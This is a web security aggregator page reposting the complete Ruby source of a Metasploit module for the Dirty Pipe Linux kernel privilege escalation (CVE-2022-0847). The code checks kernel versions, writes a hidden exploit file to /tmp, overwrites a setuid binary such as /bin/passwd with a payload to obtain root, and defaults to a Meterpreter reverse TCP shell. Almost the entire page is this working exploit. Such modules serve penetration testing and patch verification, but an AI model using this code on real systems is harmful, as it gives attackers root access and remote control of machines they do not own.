HackDig : Dig high-quality web security articles

Dirty Pipe Local Privilege Escalation

2022-03-13 08:20
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::File  include Msf::Post::Linux::Priv  include Msf::Post::Linux::Kernel  include Msf::Post::Linux::System  include Msf::Post::Linux::Compile  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Dirty Pipe Local Privilege Escalation via CVE-2022-0847',        'Description' => %q{          This exploit targets a vulnerability in the Linux kernel since 5.8, that allows          writing of read only or immutable memory.          The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.          The module exploits this vulnerability by overwriting a suid binary with the          payload, executing it, and then writing the original data back.          There are two major limitations of this exploit: the offset cannot be on a page          boundary (it needs to write one byte before the offset to add a reference to          this page to the pipe), and the write cannot cross a page boundary.          This means the payload must be less than the page size (4096 bytes).        },        'License' => MSF_LICENSE,        'Author' => [          'Max Kellermann', # Original vulnerability discovery          'timwr', # Metasploit Module        ],        'DisclosureDate' => '2022-02-20',        'SessionTypes' => ['shell', 'meterpreter'],        'Platform' => [ 'linux' ],        'Arch' => [          ARCH_X64,          ARCH_X86,          ARCH_ARMLE,          ARCH_AARCH64,        ],        'Targets' => [['Automatic', {}]],        'DefaultTarget' => 0,        'DefaultOptions' => {          'AppendExit' => true,          'PrependSetresuid' => true,          'PrependSetresgid' => true,          'PrependSetreuid' => true,          'PrependSetuid' => true,          'PrependFork' => true,          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'        },        'Privileged' => true,        'References' => [          [ 'CVE', '2022-0847' ],          [ 'URL', 'https://dirtypipe.cm4all.com' ],          [ 'URL', 'https://haxx.in/files/dirtypipez.c' ],        ],        'Notes' => {          'AKA' => [ 'Dirty Pipe' ],          'Reliability' => [ REPEATABLE_SESSION ],          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK ]        }      )    )    register_options([      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),      OptString.new('SUID_BINARY_PATH', [ false, 'The path to a suid binary', '/bin/passwd' ])    ])  end  def check    arch = kernel_arch    unless live_compile? || arch.include?('x64') || arch.include?('aarch64') || arch.include?('x86') || arch.include?('armle')      return CheckCode::Safe("System architecture #{arch} is not supported without live compilation")    end    kernel_version = Rex::Version.new kernel_release.split('-').first    if kernel_version < Rex::Version.new('5.8') ||       kernel_version >= Rex::Version.new('5.16.11') ||       (kernel_version >= Rex::Version.new('5.15.25') && kernel_version < Rex::Version.new('5.16')) ||       (kernel_version >= Rex::Version.new('5.10.102') && kernel_version < Rex::Version.new('5.11'))      return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")    end    CheckCode::Appears("Linux kernel version found: #{kernel_version}")  end  def exp_dir    datastore['WRITABLE_DIR']  end  def exploit    suid_binary_path = datastore['SUID_BINARY_PATH']    fail_with(Failure::BadConfig, 'The suid binary was not found; try setting SUID_BINARY_PATH') if suid_binary_path.nil?    fail_with(Failure::BadConfig, "The #{suid_binary_path} binary setuid bit is not set") unless setuid?(suid_binary_path)    arch = kernel_arch    vprint_status("Detected architecture: #{arch}")    vprint_status("Detected payload arch: #{payload.arch.first}")    unless arch == payload.arch.first      fail_with(Failure::BadConfig, 'Payload/Host architecture mismatch. Please select the proper target architecture')    end    payload_data = generate_payload_exe[1..] # trim the first byte (0x74)    if payload_data.length > 4095      fail_with(Failure::BadConfig, "Payload size #{payload_data.length} is too large (> 4095)")    end    fail_with(Failure::BadConfig, "#{exp_dir} is not writable") unless writable?(exp_dir)    exploit_file = "#{exp_dir}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"    if live_compile?      vprint_status('Live compiling exploit on system...')      exploit_c = exploit_data('CVE-2022-0847', 'CVE-2022-0847.c')      exploit_c.sub!(/payload_bytes.*$/, "payload_bytes[#{payload_data.length}] = {#{Rex::Text.to_num(payload_data)}};")      upload_and_compile(exploit_file, exploit_c)    else      vprint_status('Dropping pre-compiled exploit on system...')      exploit_bin = exploit_data('CVE-2022-0847', "CVE-2022-0847-#{arch}")      payload_placeholder_index = exploit_bin.index('PAYLOAD_PLACEHOLDER')      exploit_bin[payload_placeholder_index, payload_data.length] = payload_data      upload_and_chmodx(exploit_file, exploit_bin)    end    register_file_for_cleanup(exploit_file)    overwrite_file_path = datastore['SUID_BINARY_PATH']    cmd = "#{exploit_file} #{overwrite_file_path}"    print_status("Executing exploit '#{cmd}'")    result = cmd_exec(cmd)    vprint_status("Exploit result:n#{result}")  endend


Source: 0600302202-BLW/eussi/moc.ytirucesxc

Read:2354 | Comments:0 | Tags: privilege

“Dirty Pipe Local Privilege Escalation”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)
Tell me why you support me <3

Tag Cloud